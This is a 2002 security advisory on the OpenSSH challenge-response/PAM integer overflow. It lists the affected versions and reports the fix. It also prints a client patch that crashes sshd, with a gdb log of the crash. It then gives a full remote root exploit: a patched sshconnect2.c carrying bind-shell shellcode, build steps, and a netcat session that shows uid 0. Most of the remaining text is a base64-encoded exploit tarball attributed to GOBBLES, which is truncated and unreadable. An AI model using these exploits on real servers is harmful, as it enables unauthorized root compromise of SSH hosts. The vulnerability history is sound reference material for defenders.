18th Nov 2002 [SBWID-5482]
COMMAND
OpenSSH remote buffer overflow
SYSTEMS AFFECTED
All versions prior to (and including) 0penSSH 3.3
OpenSSH before v3.0 are not vulnerable if SKEY and BSD_AUTH options are NOT
enabled
OpenSSH afther (including) v3.0 has BSD_AUTH enabled by default and are
therefore vulnerable
Update (06 January 2003)
======
All existing PAM enabled versions of OpenSSH (3.5p1, 3.4p1 and below) ??
PROBLEM
Theo de Raadt [deraadt@cvs.openbsd.org] initialy posted a warning about
a vulnerability in openSSH. ISS [http://www.iss.net] is now posting
details thanks to Mark Dowd findings :
http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584
A buffer overflow can be triggered while the user responds to the
challenge during SKEY/BSD_AUTH style authentification.
Update (27 June 2002)
======
To be more specific, Markus Friedl of OpenBSD adds :
OpenSSH's sshd contain an input validation error that can result in an
integer overflow and privilege escalation.
All versions between 2.3.1 and 3.3 contain a bug in the
PAMAuthenticationViaKbdInt code.
All versions between 2.9.9 and 3.3 contain a bug in the
ChallengeResponseAuthentication code.
OpenSSH 3.4 and later are not affected.
-- See the diff in solutions for details --
Update (28 June 2002)
======
Joe Testa of Rapid7 security [http://www.rapid7.com] gives the
following DoS code to sshd :
The following are instructions on how to reproduce a segmentation
violation in sshd (v3.2.3p1):
0.) Compile with PAM and S/KEY support.
1.) Apply the following patch to the ssh client:
- --- sshconnect2.c.bak Thu Jun 27 11:54:54 2002
+++ sshconnect2.c Thu Jun 27 11:56:27 2002
@@ -866,6 +866,7 @@
xfree(lang);
num_prompts = packet_get_int();
+ num_prompts = 2;
/*
* Begin to build info response packet based on prompts requested.
* We commit to providing the correct number of responses, so if
@@ -877,15 +878,16 @@
debug2("input_userauth_info_req: num_prompts %d", num_prompts);
for (i = 0; i < num_prompts; i++) {
+ if ( i == 0 ) {
prompt = packet_get_string(NULL);
echo = packet_get_char();
response = read_passphrase(prompt, echo ? RP_ECHO : 0);
- -
+ }
packet_put_cstring(response);
- - memset(response, 0, strlen(response));
+ /*memset(response, 0, strlen(response));
xfree(response);
- - xfree(prompt);
+ xfree(prompt);*/
}
packet_check_eom(); /* done with parsing incoming message. */
2.) Add "PAMAuthenticationViaKbdInt yes" to 'sshd_config'.
3.) Connect to sshd using the modified client.
Note: valid credentials are not required.
On the server side, you'll see:
[root@wonderland hi_chad]# gdb /usr/sbin/sshd
GNU gdb Red Hat Linux 7.x (5.0rh-15) (MI_OUT)
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) run -d
Starting program: /usr/sbin/sshd -d
debug1: sshd version OpenSSH_3.2.3p1
debug1: private host key: #0 type 0 RSA1
debug1: read PEM private key done: type RSA
debug1: private host key: #1 type 1 RSA
debug1: read PEM private key done: type DSA
debug1: private host key: #2 type 2 DSA
socket: Address family not supported by protocol
debug1: Bind to port 22 on 0.0.0.0.
Server listening on 0.0.0.0 port 22.
Generating 768 bit RSA key.
RSA key generation complete.
debug1: Server will not fork when running in debugging mode.
Connection from 127.0.0.1 port 33208
debug1: Client protocol version 2.0; client software version OpenSSH_3.2.3p1
debug1: match: OpenSSH_3.2.3p1 pat OpenSSH*
Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-1.99-OpenSSH_3.2.3p1
debug1: list_hostkey_types: ssh-rsa,ssh-dss
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: client->server aes128-cbc hmac-md5 none
debug1: kex: server->client aes128-cbc hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST received
debug1: SSH2_MSG_KEX_DH_GEX_GROUP sent
debug1: dh_gen_key: priv key bits set: 124/256
debug1: bits set: 1626/3191
debug1: expecting SSH2_MSG_KEX_DH_GEX_INIT
debug1: bits set: 1597/3191
debug1: SSH2_MSG_KEX_DH_GEX_REPLY sent
debug1: kex_derive_keys
debug1: newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: waiting for SSH2_MSG_NEWKEYS
debug1: newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: KEX done
debug1: userauth-request for user jdog service ssh-connection method none
debug1: attempt 0 failures 0
debug1: Starting up PAM with username "jdog"
debug1: PAM setting rhost to "localhost.localdomain"
Failed none for jdog from 127.0.0.1 port 33208 ssh2
debug1: userauth-request for user jdog service ssh-connection method
keyboard-interactive
debug1: attempt 1 failures 1
debug1: keyboard-interactive devs
debug1: auth2_challenge: user=jdog devs=
debug1: kbdint_alloc: devices 'skey'
debug1: auth2_challenge_start: trying authentication method 'skey'
debug1: got 2 responses
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x08053822 in strcpy ()
(gdb)
Update (01 July 2002)
======
Christophe Devine kindly sent us a remote exploit for OpenBSD &
OpenSSH 3.2 :
1. Download openssh-3.2.2p1.tar.gz and untar it
~ $ tar -xvzf openssh-3.2.2p1.tar.gz
2. Apply the patch provided below by running:
~/openssh-3.2.2p1 $ patch < path_to_diff_file
3. Compile the patched client
~/openssh-3.2.2p1 $ ./configure && make ssh
4. Run the evil ssh:
~/openssh-3.2.2p1 $ ./ssh root:skey@localhost
5. If the sploit worked, you can connect to port 128 in another terminal:
~ $ nc localhost 128
uname -a
OpenBSD nice 3.1 GENERIC#59 i386
id
uid=0(root) gid=0(wheel) groups=0(wheel)
--- sshconnect2.c Sun Mar 31 20:49:39 2002
+++ evil-sshconnect2.c Fri Jun 28 19:22:12 2002
@@ -839,6 +839,56 @@
/*
* parse INFO_REQUEST, prompt user and send INFO_RESPONSE
*/
+
+int do_syscall( int nb_args, int syscall_num, ... );
+
+void shellcode( void )
+{
+ int server_sock, client_sock, len;
+ struct sockaddr_in server_addr;
+ char rootshell[12], *argv[2], *envp[1];
+
+ server_sock = do_syscall( 3, 97, AF_INET, SOCK_STREAM, 0 );
+ server_addr.sin_addr.s_addr = 0;
+ server_addr.sin_port = 32768;
+ server_addr.sin_family = AF_INET;
+ do_syscall( 3, 104, server_sock, (struct sockaddr *) &server_addr, 16 );
+ do_syscall( 2, 106, server_sock, 1 );
+ client_sock = do_syscall( 3, 30, server_sock, (struct sockaddr *)
+ &server_addr, &len );
+ do_syscall( 2, 90, client_sock, 0 );
+ do_syscall( 2, 90, client_sock, 1 );
+ do_syscall( 2, 90, client_sock, 2 );
+ * (int *) ( rootshell + 0 ) = 0x6E69622F;
+ * (int *) ( rootshell + 4 ) = 0x0068732f;
+ * (int *) ( rootshell + 8 ) = 0;
+ argv[0] = rootshell;
+ argv[1] = 0;
+ envp[0] = 0;
+ do_syscall( 3, 59, rootshell, argv, envp );
+}
+
+int do_syscall( int nb_args, int syscall_num, ... )
+{
+ int ret;
+ asm(
+ "mov 8(%ebp), %eax; "
+ "add $3,%eax; "
+ "shl $2,%eax; "
+ "add %ebp,%eax; "
+ "mov 8(%ebp), %ecx; "
+ "push_args: "
+ "push (%eax); "
+ "sub $4, %eax; "
+ "loop push_args; "
+ "mov 12(%ebp), %eax; "
+ "push $0; "
+ "int $0x80; "
+ "mov %eax,-4(%ebp)"
+ );
+ return( ret );
+}
+
void
input_userauth_info_req(int type, u_int32_t seq, void *ctxt)
{
@@ -865,7 +915,7 @@
xfree(inst);
xfree(lang);
- num_prompts = packet_get_int();
+ num_prompts = 1073741824 + 1024;
/*
* Begin to build info response packet based on prompts requested.
* We commit to providing the correct number of responses, so if
@@ -874,6 +924,13 @@
*/
packet_start(SSH2_MSG_USERAUTH_INFO_RESPONSE);
packet_put_int(num_prompts);
+
+ for( i = 0; i < 1045; i++ )
+ packet_put_cstring( "xxxxxxxxxx" );
+
+ packet_put_string( shellcode, 2047 );
+ packet_send();
+ return;
debug2("input_userauth_info_req: num_prompts %d", num_prompts);
for (i = 0; i < num_prompts; i++) {
Update (02 July 2002)
======
GOBBLES [http://www.immunitysec.com/GOBBLES/] provides a remote OpenSSH
exploit for 2.9.9-3.3.
Content-type: application/x-gzip; name="sshutup-theo.tar.gz"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="sshutup-theo.tar.gz"
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
